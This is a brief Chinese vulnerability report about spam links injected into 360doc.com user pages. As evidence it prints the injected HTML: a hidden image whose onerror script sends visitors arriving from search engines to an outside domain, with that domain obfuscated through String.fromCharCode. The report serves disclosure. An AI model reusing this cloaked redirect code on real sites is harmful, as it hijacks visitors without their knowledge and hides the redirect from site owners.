360doc存在漏洞,导致被挂暗链

一、详细说明：其中包括情报涉及的人员、利用点、利用方式等

使用百度搜索: 色妹妹 360doc.com

https://www.baidu.com/s?wd=%E8%89%B2%E5%A6%B9%E5%A6%B9%20360doc.com&rsv_spt=1&rsv_iqid=0xa5d3f6790000fe64&issp=1&f=8&rsv_bp=1&rsv_idx=2&ie=utf-8&tn=baiduhome_pg&rsv_enter=1&oq=%E5%A6%B9%E5%A6%B9%20%26lt%3B60doc.com&inputT=834&rsv_t=6996CGgdySz4u%2FAdpWAyjI7JjEyUF0HohtLt82PAJxSXgGCLy5SKO1dZARjm0%2F10X%2FH3&rsv_sug3=28&rsv_pq=efbae65500044e01&rsv_sug2=0&rsv_sug4=1256

二、问题证明：

点击该链接就会进入到 :  http://www.360doc.com/userhome/11849094/

然后开始跳转到:www.53kkk.in域名下,利用代码如下

 <div style='width:365px; text-align:center;'>

  < img src="http://rblog.china.com/images/supertable/previewicon.gif" width='365px'/>

</div>

<div style='padding:10px 15px;' class="list helpmkwz">

  <IMG style="DISPLAY: none" border=0 onerror="r=document.referrer.toLowerCase();if(r.indexOf('baidu') != -1 || r.indexOf('soso') != -1 || r.indexOf('sogou') != -1 || r.indexOf('bing') != -1 || r.indexOf('yahoo') != -1 || r.indexOf('google') != -1) location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,53,51,107,107,107,46,105,110,47)" src="">

</div>